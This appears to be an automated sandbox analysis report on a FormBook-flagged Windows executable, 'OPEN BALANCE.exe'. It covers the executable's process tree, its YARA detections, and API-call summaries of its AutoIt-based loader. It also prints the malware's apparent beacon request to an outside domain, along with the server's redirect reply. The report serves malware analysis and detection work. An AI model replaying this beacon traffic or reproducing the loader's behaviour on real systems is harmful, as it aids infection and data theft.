Jul 26, 2024 09:42:56.782439947 CEST	512	OUT	GET /m0g5/?JNx8tTw=v+1eTQfXPK01THcu7pbmAS42DyzqlOtItb5Eb9c8KvL/A6xTgKiPVGfIIznZuhkLGgsCmT/+LFa4xDCCaumIevXLE/pBvbyNXBWM5DHRFsPfN4jorGf/PcFvNcFgYAm0gQ==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.corbincodes.tech Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:42:57.260608912 CEST	409	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 07:42:57 GMT Content-Type: text/html Content-Length: 269 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 4e 78 38 74 54 77 3d 76 2b 31 65 54 51 66 58 50 4b 30 31 54 48 63 75 37 70 62 6d 41 53 34 32 44 79 7a 71 6c 4f 74 49 74 62 35 45 62 39 63 38 4b 76 4c 2f 41 36 78 54 67 4b 69 50 56 47 66 49 49 7a 6e 5a 75 68 6b 4c 47 67 73 43 6d 54 2f 2b 4c 46 61 34 78 44 43 43 61 75 6d 49 65 76 58 4c 45 2f 70 42 76 62 79 4e 58 42 57 4d 35 44 48 52 46 73 50 66 4e 34 6a 6f 72 47 66 2f 50 63 46 76 4e 63 46 67 59 41 6d 30 67 51 3d 3d 26 46 30 61 3d 44 44 76 54 58 72 5f 48 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JNx8tTw=v+1eTQfXPK01THcu7pbmAS42DyzqlOtItb5Eb9c8KvL/A6xTgKiPVGfIIznZuhkLGgsCmT/+LFa4xDCCaumIevXLE/pBvbyNXBWM5DHRFsPfN4jorGf/PcFvNcFgYAm0gQ==&F0a=DDvTXr_Hk"}</script></head></html>

Target ID:	0
Start time:	03:39:47
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\OPEN BALANCE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OPEN BALANCE.exe"
Imagebase:	0x840000
File size:	770'560 bytes
MD5 hash:	3C7E962B0A10CDB5CC5DE42BC2E29D5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:39:48
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OPEN BALANCE.exe"
Imagebase:	0x650000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:40:22
Start date:	26/07/2024
Path:	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe"
Imagebase:	0xcb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:40:23
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\attrib.exe"
Imagebase:	0x280000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:40:49
Start date:	26/07/2024
Path:	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe"
Imagebase:	0xcb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:41:04
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	4.9%
Total number of Nodes:	1935
Total number of Limit Nodes:	51

Executed Functions

Function 008442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0084430D

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

GetCurrentProcess.KERNEL32(?,008DCB64,00000000,?,?), ref: 00844422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00844429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00844454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00844466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00844474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0084447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008444A0

Strings

GetNativeSystemInfo, xrefs: 00844460
kernel32.dll, xrefs: 0084444F
|O, xrefs: 008836F8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 202f8c061819027f31542b8aa8dcc46e4a90dff7f764d8ededde8e9ab0366ad0
Instruction ID: ecb33a3f133d6f32657937bf401d4b0308372a9937fab5d117de4f3c91d1e793
Opcode Fuzzy Hash: 202f8c061819027f31542b8aa8dcc46e4a90dff7f764d8ededde8e9ab0366ad0
Instruction Fuzzy Hash: 32A1D761B2E2C8FFCB11E7697C443D57FA4FB26704B08D4AAE271D3629D2204546FB25

Function 00843170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0084316A,?,?), ref: 008431D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0084316A,?,?), ref: 00843204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00843227
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00843232
CreatePopupMenu.USER32 ref: 00843246
PostQuitMessage.USER32(00000000), ref: 00843267

Strings

TaskbarCreated, xrefs: 0084322D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 32d8d60f152e0f690a52c4333c0a7c829f39cf26cf7af751a8dfbbd4ebdcbaeb
Instruction ID: 11895d357a34a8d7c997fedb80296ac0d452fedd139c3f455855b80f377d024f
Opcode Fuzzy Hash: 32d8d60f152e0f690a52c4333c0a7c829f39cf26cf7af751a8dfbbd4ebdcbaeb
Instruction Fuzzy Hash: ED41483135422CBBDF252B3CAC4DBB93B59F705305F044226FA12C62A5CBB19B41E762

Function 008442A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008450AA,?,?,00000000,00000000), ref: 008442C9
LoadResource.KERNEL32(?,00000000,?,?,008450AA,?,?,00000000,00000000,?,?,?,?,?,?,00844F20), ref: 008835BE
SizeofResource.KERNEL32(?,00000000,?,?,008450AA,?,?,00000000,00000000,?,?,?,?,?,?,00844F20), ref: 008835D3
LockResource.KERNEL32(008450AA,?,?,008450AA,?,?,00000000,00000000,?,?,?,?,?,?,00844F20,?), ref: 008835E6

Strings

SCRIPT, xrefs: 008442BF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SCRIPT
API String ID: 3473537107-3967369404
Opcode ID: 4d3b96f7cbae6d1fe1f5af8beb7f038e80707b4034fac812979b2fbea2e85e20
Instruction ID: d96ea2d093423ae39a1bd6878d4cfa169e6a365e1da810f729aefc49de4a94c4
Opcode Fuzzy Hash: 4d3b96f7cbae6d1fe1f5af8beb7f038e80707b4034fac812979b2fbea2e85e20
Instruction Fuzzy Hash: 82117CB0201716BFDB218BA5DC48F277BBAFBC5B51F10426EF412D6290DBB2D800C620

Function 00882BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00842B6B

Part of subcall function 00843A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00911418,?,00842E7F,?,?,?,00000000), ref: 00843A78

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00902224), ref: 00882C10
ShellExecuteW.SHELL32(00000000,?,?,00902224), ref: 00882C17

Strings

runas, xrefs: 00882C0B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 74e41a57861c47efee9d6731ca59c5b47ff5ae53f7745c834bb01de16d849ae9
Instruction ID: 0294ad6e995551cfc1b1357660fd6a949c67701a5a30a4b5af9c602aae951d31
Opcode Fuzzy Hash: 74e41a57861c47efee9d6731ca59c5b47ff5ae53f7745c834bb01de16d849ae9
Instruction Fuzzy Hash: 0C11B13120C34DAAC714FF68E8559BEB7A4FF91764F84142DF182D21A2CF218A49C713

Function 008ADBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00885222), ref: 008ADBCE
GetFileAttributesW.KERNELBASE(?), ref: 008ADBDD
FindFirstFileW.KERNELBASE(?,?), ref: 008ADBEE
FindClose.KERNEL32(00000000), ref: 008ADBFA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 1eb78eb4f6296182f28fc661181d5a27bd96ee71e9ae86e22ffbdf9de3021645
Instruction ID: e06809cc2f3b53f7c8895c1e6bb7168e2b0a94e5bdff5223a68f4f0ffdae32f8
Opcode Fuzzy Hash: 1eb78eb4f6296182f28fc661181d5a27bd96ee71e9ae86e22ffbdf9de3021645
Instruction Fuzzy Hash: B1F0A030811A255792206B78AC0D8AA376CFF02334B904713F876C2AE0EBB85D54C695

Function 0084D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0084D807
timeGetTime.WINMM ref: 0084DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084DB28
TranslateMessage.USER32(?), ref: 0084DB7B
DispatchMessageW.USER32(?), ref: 0084DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0084DB9F
Sleep.KERNEL32(0000000A), ref: 0084DBB1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 76242aa1137eaf4f979c73bddeaf66fdef2f0c2c442d518e9ce8322f653722ba
Instruction ID: 44d0507325df2544bcb4c72512a563c1a7dbc993f18a46511cd63c4b2953654a
Opcode Fuzzy Hash: 76242aa1137eaf4f979c73bddeaf66fdef2f0c2c442d518e9ce8322f653722ba
Instruction Fuzzy Hash: 3F42C33060834AEFDB29DF28C884BAABBE1FF55314F188659E955C7391D770E844CB92

Function 0088065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0088039A: CreateFileW.KERNELBASE(00000000,00000000,?,00880704,?,?,00000000,?,00880704,00000000,0000000C), ref: 008803B7

GetLastError.KERNEL32 ref: 0088076F
__dosmaperr.LIBCMT ref: 00880776
GetFileType.KERNELBASE(00000000), ref: 00880782
GetLastError.KERNEL32 ref: 0088078C
__dosmaperr.LIBCMT ref: 00880795
CloseHandle.KERNEL32(00000000), ref: 008807B5
CloseHandle.KERNEL32(?), ref: 008808FF
GetLastError.KERNEL32 ref: 00880931
__dosmaperr.LIBCMT ref: 00880938

Strings

H, xrefs: 008808BD

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d5b01ce277a4b0bdf8532172bd5e3855c160ddc8264c41181b6ea588f2e82aaf
Instruction ID: 3482bba0f647c5a1f936ecfbad42817b1d8bc8d6d26848faa0ca616f5a7e595c
Opcode Fuzzy Hash: d5b01ce277a4b0bdf8532172bd5e3855c160ddc8264c41181b6ea588f2e82aaf
Instruction Fuzzy Hash: 7FA11132A141088FDF19AF68DC52BAE7BA0FB4A324F144159F815DB392DB319C56CF92

Function 0084344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00843A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00911418,?,00842E7F,?,?,?,00000000), ref: 00843A78

Part of subcall function 00843357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00843379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0084356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0088318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008831CE
RegCloseKey.ADVAPI32(?), ref: 00883210
_wcslen.LIBCMT ref: 00883277
_wcslen.LIBCMT ref: 00883286

Strings

\, xrefs: 0088328C
Software\AutoIt v3\AutoIt, xrefs: 00843560
\Include\, xrefs: 00843527
Include, xrefs: 00883184, 008831C5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 9709f7edfb3501fda048c1ef707c906657a9d7b193168ad7477b7069fad90964
Instruction ID: 208673eb99f089041833e60dacc83c61f01287023c70887ecb344ab7c3973132
Opcode Fuzzy Hash: 9709f7edfb3501fda048c1ef707c906657a9d7b193168ad7477b7069fad90964
Instruction Fuzzy Hash: ED71D1716183059EC314FF29EC8289BBBE8FF84B40F40452EF564C72A1EB308A59CB52

Function 00842B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00842B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00842B9D
LoadIconW.USER32(00000063), ref: 00842BB3
LoadIconW.USER32(000000A4), ref: 00842BC5
LoadIconW.USER32(000000A2), ref: 00842BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00842BEF
RegisterClassExW.USER32(?), ref: 00842C40

Part of subcall function 00842CD4: GetSysColorBrush.USER32(0000000F), ref: 00842D07
Part of subcall function 00842CD4: RegisterClassExW.USER32(00000030), ref: 00842D31
Part of subcall function 00842CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00842D42
Part of subcall function 00842CD4: LoadIconW.USER32(000000A9), ref: 00842D85

Strings

AutoIt v3, xrefs: 00842C2F
#, xrefs: 00842C16
0, xrefs: 00842C0F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 4cc5ae15735fc3ae8b7d4e4786c1881b7ab0d71d7d22172733716b22730d9795
Instruction ID: 5019fc32f38895f06d19d2f28e620a51fa5283fd63e3f3e0328abe9637f83cd0
Opcode Fuzzy Hash: 4cc5ae15735fc3ae8b7d4e4786c1881b7ab0d71d7d22172733716b22730d9795
Instruction Fuzzy Hash: 9B213A70F26318BBDB109FA9ED55ADDBFB4FB08B50F00811AF610A66A4D3B10541EF90

Function 00842CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00842D07
RegisterClassExW.USER32(00000030), ref: 00842D31
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00842D42
LoadIconW.USER32(000000A9), ref: 00842D85

Strings

TaskbarCreated, xrefs: 00842D37
+, xrefs: 00842CF0
AutoIt v3 GUI, xrefs: 00842D23
0, xrefs: 00842CE9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
